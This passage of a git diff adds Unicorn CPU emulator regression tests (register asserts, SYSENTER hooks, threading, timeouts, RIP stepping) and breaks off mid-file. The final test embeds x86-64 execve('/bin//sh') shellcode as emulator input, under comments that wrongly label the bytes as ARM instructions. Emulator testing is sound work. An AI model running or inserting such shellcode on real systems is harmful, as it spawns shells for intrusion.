uc.reg_read(UC_SPARC_REG_G5) == 1 +assert uc.reg_read(UC_SPARC_REG_G6) == 1 +assert uc.reg_read(UC_SPARC_REG_G7) == 1 + +assert uc.reg_read(UC_SPARC_REG_O0) == 1 +assert uc.reg_read(UC_SPARC_REG_O1) == 1 +assert uc.reg_read(UC_SPARC_REG_O2) == 1 +assert uc.reg_read(UC_SPARC_REG_O3) == 1 +assert uc.reg_read(UC_SPARC_REG_O4) == 1 +assert uc.reg_read(UC_SPARC_REG_O5) == 1 +assert uc.reg_read(UC_SPARC_REG_O6) == 101 +assert uc.reg_read(UC_SPARC_REG_O7) == 1 + +assert uc.reg_read(UC_SPARC_REG_L0) == 1 +assert uc.reg_read(UC_SPARC_REG_L1) == 1 +assert uc.reg_read(UC_SPARC_REG_L2) == 1 +assert uc.reg_read(UC_SPARC_REG_L3) == 1 +assert uc.reg_read(UC_SPARC_REG_L4) == 1 +assert uc.reg_read(UC_SPARC_REG_L5) == 1 +assert uc.reg_read(UC_SPARC_REG_L6) == 1 +assert uc.reg_read(UC_SPARC_REG_L7) == 1 + +assert uc.reg_read(UC_SPARC_REG_I0) == 1 +assert uc.reg_read(UC_SPARC_REG_I1) == 1 +assert uc.reg_read(UC_SPARC_REG_I2) == 1 +assert uc.reg_read(UC_SPARC_REG_I3) == 1 +assert uc.reg_read(UC_SPARC_REG_I4) == 1 +assert uc.reg_read(UC_SPARC_REG_I5) == 1 +assert uc.reg_read(UC_SPARC_REG_I6) == 201 +assert uc.reg_read(UC_SPARC_REG_I7) == 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/sysenter_hook_x86.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sysenter_hook_x86.c new file mode 100644 index 0000000..7cf7b7c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sysenter_hook_x86.c @@ -0,0 +1,60 @@ +#include + +// code to be emulated +#define X86_CODE32 "\x0F\x34" // SYSENTER + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +int got_sysenter = 0; + +void sysenter (uc_engine *uc, void *user) { + printf ("SYSENTER hook called.\n"); + got_sysenter = 1; +} + +int main(int argc, char **argv, char **envp) +{ + uc_engine *uc; + uc_err err; + uc_hook sysenterHook; + + // Initialize emulator in X86-32bit mode + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + return -1; + } + + // map 2MB memory for this emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1)) { + printf("Failed to write emulation code to memory, quit!\n"); + return -1; + } + + // Hook the SYSENTER instructions + if (uc_hook_add (uc, &sysenterHook, UC_HOOK_INSN, sysenter, NULL, 1, 0, UC_X86_INS_SYSENTER) != UC_ERR_OK) { + printf ("Cannot hook SYSENTER instruction\n."); + return -1; + } + + // emulate code in infinite time & unlimited instructions + err=uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32) - 1, 0, 0); + if (err) { + printf("Failed on uc_emu_start() with error returned %u: %s\n", + err, uc_strerror(err)); + } + + printf("Emulation done.\n"); + uc_close(uc); + + if (!got_sysenter) { + printf ("[!] ERROR : SYSENTER hook not called.\n"); + return -1; + } + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/tcg_liveness_analysis_bug_issue-287.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/tcg_liveness_analysis_bug_issue-287.py new file mode 100644 index 0000000..4310a8c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/tcg_liveness_analysis_bug_issue-287.py @@ -0,0 +1,134 @@ +from unicorn import * +from unicorn.arm_const import * +import binascii + +MB = 1024 * 1024 +PAGE = 4 * 1024 + +def PrintArmRegisters(uc_emu): + print 'R0 : '+hex(uc_emu.reg_read(UC_ARM_REG_R0)) + print 'R1 : '+hex(uc_emu.reg_read(UC_ARM_REG_R1)) + print 'R2 : '+hex(uc_emu.reg_read(UC_ARM_REG_R2)) + print 'R3 : '+hex(uc_emu.reg_read(UC_ARM_REG_R3)) + print 'R4 : '+hex(uc_emu.reg_read(UC_ARM_REG_R4)) + print 'R5 : '+hex(uc_emu.reg_read(UC_ARM_REG_R5)) + print 'R6 : '+hex(uc_emu.reg_read(UC_ARM_REG_R6)) + print 'R7 : '+hex(uc_emu.reg_read(UC_ARM_REG_R7)) + print 'R8 : '+hex(uc_emu.reg_read(UC_ARM_REG_R8)) + print 'R9 : '+hex(uc_emu.reg_read(UC_ARM_REG_R9)) + print 'R10 : '+hex(uc_emu.reg_read(UC_ARM_REG_R10)) + print 'R11 : '+hex(uc_emu.reg_read(UC_ARM_REG_R11)) + print 'R12 : '+hex(uc_emu.reg_read(UC_ARM_REG_R12)) + print 'SP : '+hex(uc_emu.reg_read(UC_ARM_REG_SP)) + print 'LR : '+hex(uc_emu.reg_read(UC_ARM_REG_LR)) + print 'PC : '+hex(uc_emu.reg_read(UC_ARM_REG_PC)) + flags = uc_emu.reg_read(UC_ARM_REG_CPSR) + print 'carry : '+str(flags >> 29 & 0x1) + print 'overflow : '+str(flags >> 28 & 0x1) + print 'negative : '+str(flags >> 31 & 0x1) + print 'zero : '+str(flags >> 30 & 0x1) + +''' + issue #287 + Initial Register States: R0=3, R1=24, R2=16, R3=0 + ----- code start ----- + CMP R0,R1,LSR#3 + SUBCS R0,R0,R1,LSR#3 # CPU flags got changed in these two instructions, and *REMEMBERED*, now NF == VF == 0 + CMP R0,#1 # CPU flags changed again, now NF == 1, VF == 0, but they are not properly *REMEMBERED* + MOV R1,R1,LSR#4 + SUBGES R2,R2,#4 # according to the result of CMP, we should skip this op + + MOVGE R3,#100 # since changed flags are not *REMEMBERED* in CMP, now NF == VF == 0, which result in wrong branch + # at the end of this code block, should R3 == 0 + ----- code end ------ + + # TCG ops are correct, plain op translation is done correctly, + # but there're In-Memory bits invisible from ops that control the host code generation. + # all these codes are in one TCG translation-block, so wrong things could happen. + # detail explanation is given on the right side. + # remember, both set_label and brcond are point to refresh the dead_temps and mem_temps states in TCG + ----- TCG ops ------ + ld_i32 tmp5,env,$0xfffffffffffffff4 + movi_i32 tmp6,$0x0 + brcond_i32 tmp5,tmp6,ne,$0x0 + mov_i32 tmp5,r1 ------------------------- + movi_i32 tmp6,$0x3 | + shr_i32 tmp5,r1,tmp6 | + mov_i32 tmp6,r0 | + sub_i32 NF,r0,tmp5 | + mov_i32 ZF,NF | + setcond_i32 CF,r0,tmp5,geu | # This part is "CMP R0,R1,LSR#3" + xor_i32 VF,NF,r0 |-----> # and "SUBCS R0,R0,R1,LSR#3" + xor_i32 tmp7,r0,tmp5 | # the last op in this block, set_label get a chance to refresh the TCG globals memory states, + and_i32 VF,VF,tmp7 | # so things get back to normal states + mov_i32 tmp6,NF | # these codes are not affected by the bug. Let's called this Part-D + movi_i32 tmp5,$0x0 | + brcond_i32 CF,tmp5,eq,$0x1 | + mov_i32 tmp5,r1 | + movi_i32 tmp6,$0x3 | + shr_i32 tmp5,r1,tmp6 | + mov_i32 tmp6,r0 | + sub_i32 tmp6,r0,tmp5 | + mov_i32 r0,tmp6 | + set_label $0x1 ------------------------- + movi_i32 tmp5,$0x1 ----------------- # Let's called this Part-C + mov_i32 tmp6,r0 | # NF is used as output operand again! + sub_i32 NF,r0,tmp5 ----------------|-----> # but it is stated as Not-In-Memory, + mov_i32 ZF,NF | # no need to sync it after calculation. + setcond_i32 CF,r0,tmp5,geu | # the generated host code does not write NF + xor_i32 VF,NF,r0 | # back to its memory location, hence forgot. And the CPU flags after this calculation is not changed. + xor_i32 tmp7,r0,tmp5 | # Caution: the following SUBGES's condition check is right, even though the generated host code does not *REMEMBER* NF, it will cache the calculated result and serve SUBGES correctly + and_i32 VF,VF,tmp7 | + mov_i32 tmp6,NF | + mov_i32 tmp5,r1 | # this part is "CMP R0,#1" + movi_i32 tmp6,$0x4 | # and "MOV R1,R1,LSR#4" + shr_i32 tmp5,r1,tmp6 | # and "SUBGES R2,R2,#4" + mov_i32 r1,tmp5 |-----> # This is the part where problem start to arise + xor_i32 tmp5,VF,NF | + movi_i32 tmp6,$0x0 | + brcond_i32 tmp5,tmp6,lt,$0x2 --------|-----> # QEMU will refresh the InMemory bit for TCG globals here, but Unicorn won't + movi_i32 tmp5,$0x4 | + mov_i32 tmp6,r2 | # this is the 1st bug-related op get analyzed. + sub_i32 NF,r2,tmp5 ----------------|-----> # here, NF is an output operand, it's flagged dead + mov_i32 ZF,NF | # and the InMemory bit is clear, tell the previous(above) ops + setcond_i32 CF,r2,tmp5,geu | # if it is used as output operand again, do not sync it + xor_i32 VF,NF,r2 | # so the generated host-code for previous ops will not write it back to Memory + xor_i32 tmp7,r2,tmp5 | # Caution: the CPU flags after this calculation is also right, because the set_label is a point of refresh, make them *REMEMBERED* + and_i32 VF,VF,tmp7 | # Let's call this Part-B + mov_i32 tmp6,NF | + mov_i32 r2,ZF | + set_label $0x2 ----------------- + xor_i32 tmp5,VF,NF ----------------- + movi_i32 tmp6,$0x0 | + brcond_i32 tmp5,tmp6,lt,$0x3 | # Let's call this Part-A + movi_i32 tmp5,$0x64 | # if Part-B is not skipped, this part won't go wrong, because we'll check the CPU flags as the result of Part-B, it's *REMEMBERED* + movi_i32 r3,$0x64 |-----> # but if Part-B is skipped, + set_label $0x3 | # what should we expected? we will check the condition based on the result of Part-D!!! + call wfi,$0x0,$0,env | # because result of Part-C is lost. this is why things go wrong. + set_label $0x0 | + exit_tb $0x7f6401714013 ----------------- + ########### + ----- TCG ends ------ +''' + +TestCode = b'\xa1\x01\x50\xe1\xa1\x01\x40\x20\x01\x00\x50\xe3\x21\x12\xa0\xe1\x04\x20\x52\xa2\x64\x30\xa0\xa3' + +def UseUcToEmulate(): + try: + uc_emu = Uc(UC_ARCH_ARM, UC_MODE_ARM) + #if LoadCode(uc_emu, 2*MB, 0x9004): + uc_emu.mem_map(0, 2*MB) + uc_emu.reg_write(UC_ARM_REG_SP, 0x40000) + uc_emu.reg_write(UC_ARM_REG_R0, 3) + uc_emu.reg_write(UC_ARM_REG_R1, 24) + uc_emu.reg_write(UC_ARM_REG_R2, 16) + uc_emu.mem_write(0, TestCode) + uc_emu.emu_start(0, 24) + PrintArmRegisters(uc_emu) + + except UcError as e: + print("ERROR: %s" % e) + PrintArmRegisters(uc_emu) + + +UseUcToEmulate() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/threaded_emu_start.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/threaded_emu_start.c new file mode 100644 index 0000000..05776d7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/threaded_emu_start.c @@ -0,0 +1,241 @@ +/* +Test for uc_open() and uc_emu_start() being called by different threads. + +This code will call uc_open() in the main thread and then attempt +to call uc_emu_start() from its own thread. This would enable the emulator +to run in the background while you do other things like handle user interface +etc in the foreground. + +Currently "uc->qemu_global_mutex" is locked by uc_open() and unlocked +by uc_emu_start(). This is a problem because the mutex implementation +must be locked and unlocked by the same thread. This means that uc_open() +and uc_emu_start() must be executed in the same thread. This is an unnecessary +limitation which prevents the emulator from being able to be executed in the +background. +*/ + +// windows specific +#ifdef _MSC_VER +#include +#include +#include +#define PRIx64 "llX" +#ifdef DYNLOAD +#include +#else // DYNLOAD +#include +#ifdef _WIN64 +#pragma comment(lib, "unicorn_staload64.lib") +#else // _WIN64 +#pragma comment(lib, "unicorn_staload.lib") +#endif // _WIN64 +#endif // DYNLOAD + +// posix specific +#else // _MSC_VER +#include +#include "pthread.h" +#endif // _MSC_VER + +// for win32 threads in mingw +#ifdef _WIN32 +#include +#endif + +// common includes +#include + + +// Test MIPS little endian code. +// This should loop forever. +const uint64_t addr = 0x100000; +const unsigned char loop_test_code[] = { + 0x02,0x00,0x04,0x24, // 100000: li $a0, 2 + // loop1 + 0x00,0x00,0x00,0x00, // 100004: nop + 0xFE,0xFF,0x80,0x14, // 100008: bnez $a0, loop1 + 0x00,0x00,0x00,0x00, // 10000C: nop +}; +bool test_passed_ok = false; +int loop_count = 0; + + +// This hook is used to show that code is executing in the emulator. +static void mips_codehook(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) +{ + printf("Code: %"PRIx64"\n", address); +} + + +typedef struct { + uc_engine *uc; + uint64_t startAddr; + uint64_t endAddr; +} EmuStarterParam_t; + +// This is a thread that just runs uc_emu_start() in it. +// The code that it is executing in this case will run forever until it is stopped by uc_emu_stop(). +static uc_err emu_starter(void* param) +{ + uc_engine *uc; + uint64_t start_addr; + uint64_t end_addr; + uc_err err; + + EmuStarterParam_t* starter_params = (EmuStarterParam_t *)param; + uc = starter_params->uc; + start_addr = starter_params->startAddr; + end_addr = starter_params->endAddr; + + printf("uc_emu_start()\n"); + err = uc_emu_start(uc, start_addr, end_addr, 0, 0); + if (err) + { + printf("Failed on uc_emu_start() with error returned %u: %s\n", + err, uc_strerror(err)); + } + + return err; +} + +#ifdef _WIN32 +static unsigned int __stdcall win32_emu_starter(void* param) +{ + uc_err err = emu_starter(param); + _endthreadex(err); + return err; +} +#else +static void* posix_emu_starter(void* param) +{ + uc_err err = emu_starter(param); + return (void*)err; +} +#endif + + +int main(int argc, char **argv, char **envp) +{ + uc_engine *uc; + uc_err err; + int ret; + uc_hook hhc; + uint32_t val; + EmuStarterParam_t starter_params; +#ifdef _WIN32 + HANDLE th = (HANDLE)-1; +#else + pthread_t th; +#endif + + // dynamically load shared library +#ifdef DYNLOAD + uc_dyn_load(NULL, 0); +#endif + + // Initialize emulator in MIPS 32bit little endian mode + printf("uc_open()\n"); + err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32, &uc); + if (err) + { + printf("Failed on uc_open() with error returned: %u\n", err); + return err; + } + + // map in a page of mem + printf("uc_mem_map()\n"); + err = uc_mem_map(uc, addr, 0x1000, UC_PROT_ALL); + if (err) + { + printf("Failed on uc_mem_map() with error returned: %u\n", err); + return err; + } + + // write machine code to be emulated to memory + printf("uc_mem_write()\n"); + err = uc_mem_write(uc, addr, loop_test_code, sizeof(loop_test_code)); + if( err ) + { + printf("Failed on uc_mem_write() with error returned: %u\n", err); + return err; + } + + // hook all instructions by having @begin > @end + printf("uc_hook_add()\n"); + uc_hook_add(uc, &hhc, UC_HOOK_CODE, mips_codehook, NULL, 1, 0); + if( err ) + { + printf("Failed on uc_hook_add(code) with error returned: %u\n", err); + return err; + } + + + // start background thread + printf("---- Thread Starting ----\n"); + starter_params.uc = uc; + starter_params.startAddr = addr; + starter_params.endAddr = addr + sizeof(loop_test_code); + +#ifdef _WIN32 + // create thread + th = (HANDLE)_beginthreadex(NULL, 0, win32_emu_starter, &starter_params, CREATE_SUSPENDED, NULL); + if(th == (HANDLE)-1) + { + printf("Failed on _beginthreadex() with error returned: %p\n", _errno()); + return -1; + } + // start thread + ret = ResumeThread(th); + if( ret == -1 ) + { + printf("Failed on ResumeThread() with error returned: %p\n", _errno()); + return -2; + } + // wait 3 seconds + Sleep(3 * 1000); +#else + // add posix code to start the emu_starter() thread + ret = pthread_create(&th, NULL, posix_emu_starter, &starter_params); + if( ret ) + { + printf("Failed on pthread_create() with error returned: %u\n", err); + return -2; + } + // wait 3 seconds + sleep(3); +#endif + + + // Stop the thread after it has been let to run in the background for a while + printf("---- Thread Stopping ----\n"); + printf("uc_emu_stop()\n"); + err = uc_emu_stop(uc); + if( err ) + { + printf("Failed on uc_emu_stop() with error returned: %u\n", err); + return err; + } + test_passed_ok = true; + + + // done executing, print some reg values as a test + uc_reg_read(uc, UC_MIPS_REG_PC, &val); printf("pc is %X\n", val); + uc_reg_read(uc, UC_MIPS_REG_A0, &val); printf("a0 is %X\n", val); + + // free resources + printf("uc_close()\n"); + uc_close(uc); + + if( test_passed_ok ) + printf("\n\nTEST PASSED!\n\n"); + else + printf("\n\nTEST FAILED!\n\n"); + + // dynamically free shared library +#ifdef DYNLOAD + uc_dyn_free(); +#endif + + return 0; +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/timeout_segfault.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/timeout_segfault.c new file mode 100644 index 0000000..43abde0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/timeout_segfault.c @@ -0,0 +1,147 @@ +/* +timeout_segfault.c + +This program shows a case where the emulation timer keeps running after +emulation has ended. It triggers an intermittent segfault when _timeout_fn() +tries to call uc_emu_stop() after emulation has already been cleaned up. This +code is the same as samples/sample_arm.c, except that it adds a timeout on each +call to uc_emu_start(). See issue #78 for more details: +https://github.com/unicorn-engine/unicorn/issues/78 +*/ + +#include + + +// code to be emulated +#define ARM_CODE "\x37\x00\xa0\xe3\x03\x10\x42\xe0" // mov r0, #0x37; sub r1, r2, r3 +#define THUMB_CODE "\x83\xb0" // sub sp, #0xc + +// memory address where emulation starts +#define ADDRESS 0x10000 + +// number of seconds to wait before timeout +#define TIMEOUT 5 + +static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) +{ + printf(">>> Tracing basic block at 0x%"PRIx64 ", block size = 0x%x\n", address, size); +} + +static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) +{ + printf(">>> Tracing instruction at 0x%"PRIx64 ", instruction size = 0x%x\n", address, size); +} + +static void test_arm(void) +{ + uc_engine *uc; + uc_err err; + uc_hook trace1, trace2; + + int r0 = 0x1234; // R0 register + int r2 = 0x6789; // R1 register + int r3 = 0x3333; // R2 register + int r1; // R1 register + + printf("Emulate ARM code\n"); + + // Initialize emulator in ARM mode + err = uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc); + if (err) { + printf("Failed on uc_open() with error returned: %u (%s)\n", + err, uc_strerror(err)); + return; + } + + // map 2MB memory for this emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + uc_mem_write(uc, ADDRESS, ARM_CODE, sizeof(ARM_CODE) - 1); + + // initialize machine registers + uc_reg_write(uc, UC_ARM_REG_R0, &r0); + uc_reg_write(uc, UC_ARM_REG_R2, &r2); + uc_reg_write(uc, UC_ARM_REG_R3, &r3); + + // tracing all basic blocks with customized callback + uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); + + // tracing one instruction at ADDRESS with customized callback + uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(ARM_CODE) -1, UC_SECOND_SCALE * TIMEOUT, 0); + if (err) { + printf("Failed on uc_emu_start() with error returned: %u\n", err); + } + + // now print out some registers + printf(">>> Emulation done. Below is the CPU context\n"); + + uc_reg_read(uc, UC_ARM_REG_R0, &r0); + uc_reg_read(uc, UC_ARM_REG_R1, &r1); + printf(">>> R0 = 0x%x\n", r0); + printf(">>> R1 = 0x%x\n", r1); + + uc_close(uc); +} + +static void test_thumb(void) +{ + uc_engine *uc; + uc_err err; + uc_hook trace1, trace2; + + int sp = 0x1234; // R0 register + + printf("Emulate THUMB code\n"); + + // Initialize emulator in ARM mode + err = uc_open(UC_ARCH_ARM, UC_MODE_THUMB, &uc); + if (err) { + printf("Failed on uc_open() with error returned: %u (%s)\n", + err, uc_strerror(err)); + return; + } + + // map 2MB memory for this emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + uc_mem_write(uc, ADDRESS, THUMB_CODE, sizeof(THUMB_CODE) - 1); + + // initialize machine registers + uc_reg_write(uc, UC_ARM_REG_SP, &sp); + + // tracing all basic blocks with customized callback + uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); + + // tracing one instruction at ADDRESS with customized callback + uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(THUMB_CODE) -1, UC_SECOND_SCALE * TIMEOUT, 0); + if (err) { + printf("Failed on uc_emu_start() with error returned: %u\n", err); + } + + // now print out some registers + printf(">>> Emulation done. Below is the CPU context\n"); + + uc_reg_read(uc, UC_ARM_REG_SP, &sp); + printf(">>> SP = 0x%x\n", sp); + + uc_close(uc); +} + +int main(int argc, char **argv, char **envp) +{ + test_arm(); + printf("==========================\n"); + test_thumb(); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/translator_buffer.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/translator_buffer.py new file mode 100644 index 0000000..1f8e548 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/translator_buffer.py @@ -0,0 +1,78 @@ +#!/usr/bin/python +# By Mariano Graziano + +from unicorn import * +from unicorn.x86_const import * + +import regress, struct + + +class Emulator: + def __init__(self, code, stack): + self.mask = 0xFFFFFFFFFFFFF000 + self.unicorn_code = code + self.unicorn_stack = stack + self.mu = Uc(UC_ARCH_X86, UC_MODE_64) + size = 1 * 4096 + self.mu.mem_map(code & self.mask, size) + size = 1 * 4096 + self.mu.mem_map(stack & self.mask, size) + self.set_hooks() + + def set_hooks(self): + self.mu.hook_add(UC_HOOK_MEM_WRITE, self.hook_mem_access) + self.mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, self.hook_mem_invalid) + self.mu.hook_add(UC_HOOK_MEM_FETCH_UNMAPPED, self.hook_mem_fetch_unmapped) + + def hook_mem_fetch_unmapped(self, uc, access, address, size, value, user_data): + next_ip = self.unicorn_code + size + self.mu.reg_write(UC_X86_REG_RIP, next_ip) + self.mu.mem_write(next_ip, "\x90") + self.mu.reg_write(UC_X86_REG_RIP, address) + return True + + def hook_mem_invalid(self, uc, access, address, size, value, user_data): + return True + + def hook_mem_access(self, uc, access, address, size, value, user_data): + return True + + def emu(self, size): + ip = self.mu.reg_read(UC_X86_REG_RIP) + try: + self.mu.emu_start(ip, ip + size, timeout=10000, count=1) + except UcError as e: + print("Error %s" % e) + + def write_data(self, address, content): + self.mu.mem_write(address, content) + + +class Init(regress.RegressTest): + def init_unicorn(self, ip, sp, counter): + #print "[+] Emulating IP: %x SP: %x - Counter: %x" % (ip, sp, counter) + E = Emulator(ip, sp) + E.write_data(ip, "\x90") + E.write_data(sp, self.generate_value(counter)) + E.mu.reg_write(UC_X86_REG_RSP, sp) + E.mu.reg_write(UC_X86_REG_RIP, ip) + E.emu(1) + + def generate_value(self, counter): + start = 0xffff880026f02000 + offset = counter * 8 + address = start + offset + return struct.pack(">> Before emulation ") + print("\tD6 = 0x%x" % mu.reg_read(UC_ARM_REG_D6)) + print("\tD7 = 0x%x" % mu.reg_read(UC_ARM_REG_D7)) + for i in range(UC_ARM_REG_R0, UC_ARM_REG_R12): + val = mu.reg_read(i) + print("\t %s = 0x%x" % ("R" + str(i-UC_ARM_REG_R0),val)) + + self.assertEqual(UC_ARM_REG_D6, mu.reg_read(UC_ARM_REG_D6)) + self.assertEqual(UC_ARM_REG_D7, mu.reg_read(UC_ARM_REG_D7)) + + try: + content = mu.mem_read(SCRATCH_ADDRESS, 100) + print("Memory at addr 0x%X %s" % (SCRATCH_ADDRESS, binascii.hexlify(content))) + content = mu.mem_read(SCRATCH_ADDRESS+0x100, 100) + print("Memory at addr 0x%X %s" % (SCRATCH_ADDRESS+0x100, binascii.hexlify(content))) + except Exception, errtxt: + print (errtxt) + + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(code)) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + sp = mu.reg_read(UC_ARM_REG_SP) + print(">>> SP = 0x%x" %sp) + val = mu.reg_read(UC_ARM_REG_PC) + print(">>> PC = 0x%x" %val) + for i in range(UC_ARM_REG_R0, UC_ARM_REG_R12): + val = mu.reg_read(i) + print(">>> %s = 0x%x" % ("R" + str(i-UC_ARM_REG_R0),val)) + + print("\tD6 = 0x%x" % mu.reg_read(UC_ARM_REG_D6)) + print("\tD7 = 0x%x" % mu.reg_read(UC_ARM_REG_D7)) + + try: + content = mu.mem_read(SCRATCH_ADDRESS, 100) + print("Memory at addr 0x%X %s" % (SCRATCH_ADDRESS, binascii.hexlify(content))) + content = mu.mem_read(SCRATCH_ADDRESS+0x100, 100) + print("Memory at addr 0x%X %s" % (SCRATCH_ADDRESS+0x100, binascii.hexlify(content))) + except Exception, errtxt: + print (errtxt) + + self.assertEqual(mu.reg_read(UC_ARM_REG_D6), 0x0101010101010101) + self.assertEqual(mu.reg_read(UC_ARM_REG_D7), 0x0101010101010101) + + except UcError as e: + print("ERROR: %s" % e) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/write_before_map.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/write_before_map.py new file mode 100644 index 0000000..7bdb1e4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/write_before_map.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python + +from __future__ import print_function +from unicorn import * +from unicorn.x86_const import * + +import regress + +X86_CODE64 = "\x90" # NOP + + +class WriteBeforeMap(regress.RegressTest): + def runTest(self): + # Initialize emulator in X86-32bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_64) + + # memory address where emulation starts + ADDRESS = 0x1000000 + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE64) + + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/wrong_rip.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/wrong_rip.py new file mode 100644 index 0000000..8754980 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/wrong_rip.py @@ -0,0 +1,71 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.x86_const import * + +import regress + +binary1 = b'\xb8\x02\x00\x00\x00' # mov eax, 2 +binary2 = b'\xb8\x01\x00\x00\x00' # mov eax, 1 + +class WrongRIP(regress.RegressTest): + + def test_step(self): + mu = Uc(UC_ARCH_X86, UC_MODE_64) + mu.mem_map(0, 2 * 1024 * 1024) + # write machine code to be emulated to memory + mu.mem_write(0, binary1 + binary2) + # emu for maximum 1 instruction. + mu.emu_start(0, 5, 0, 1) + + self.assertEqual(0x2, mu.reg_read(UC_X86_REG_RAX)) + self.assertEqual(0x5, mu.reg_read(UC_X86_REG_RIP)) + + mu.emu_start(5, 10, 0, 1) + self.assertEqual(0xa, mu.reg_read(UC_X86_REG_RIP)) + self.assertEqual(0x1, mu.reg_read(UC_X86_REG_RAX)) + + def test_step2(self): + mu = Uc(UC_ARCH_X86, UC_MODE_64) + mu.mem_map(0, 2 * 1024 * 1024) + # write machine code to be emulated to memory + mu.mem_write(0, binary1 + binary2) + # emu for maximum 1 instruction. + mu.emu_start(0, 10, 0, 1) + self.assertEqual(0x2, mu.reg_read(UC_X86_REG_RAX)) + self.assertEqual(0x5, mu.reg_read(UC_X86_REG_RIP)) + + mu.emu_start(5, 10, 0, 1) + self.assertEqual(0x1, mu.reg_read(UC_X86_REG_RAX)) + self.assertEqual(0xa, mu.reg_read(UC_X86_REG_RIP)) + + def test_step3(self): + bin3 = b'\x40\x01\xc1\x31\xf6' # inc eax; add ecx, eax; xor esi, esi + mu = Uc(UC_ARCH_X86, UC_MODE_32) + mu.mem_map(0, 2 * 1024 * 1024) + # write machine code to be emulated to memory + mu.mem_write(0, bin3) + # emu for maximum 1 instruction. + mu.emu_start(0, 10, 0, 1) + self.assertEqual(0x1, mu.reg_read(UC_X86_REG_EAX)) + self.assertEqual(0x1, mu.reg_read(UC_X86_REG_EIP)) + + def test_step_then_fin(self): + bin4 = b'\x40\x01\xc1\x31\xf6\x90\x90\x90' # inc eax; add ecx, eax; xor esi, esi + mu = Uc(UC_ARCH_X86, UC_MODE_32) + mu.mem_map(0, 2 * 1024 * 1024) + # write machine code to be emulated to memory + mu.mem_write(0, bin4) + # emu for maximum 1 instruction. + mu.emu_start(0, len(binary1), 0, 1) + + self.assertEqual(0x1, mu.reg_read(UC_X86_REG_EAX)) + self.assertEqual(0x1, mu.reg_read(UC_X86_REG_EIP)) + # emu to the end + mu.emu_start(1, len(bin4)) + self.assertEqual(0x1, mu.reg_read(UC_X86_REG_EAX)) + self.assertEqual(len(bin4), mu.reg_read(UC_X86_REG_EIP)) + +if __name__ == '__main__': + regress.main() + diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/wrong_rip_arm.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/wrong_rip_arm.py new file mode 100644 index 0000000..de710d8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/wrong_rip_arm.py @@ -0,0 +1,38 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.x86_const import * +from unicorn.arm_const import * + +import regress + +# adds r1, #0x48 +# ldrsb r7, [r7, r7] +# ldrsh r7, [r2, r1] +# ldr r0, [pc, #0x168] +# cmp r7, #0xbf +# str r7, [r5, #0x20] +# ldr r1, [r5, #0x64] +# strb r7, [r5, #0xc] +# ldr r0, [pc, #0x1a0] +binary1 = b'\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05' +# binary1 = b'\x48\x31\xff\x57' +#adds r1, #0x48 +#ldrsb r7, [r7, r7] + +class 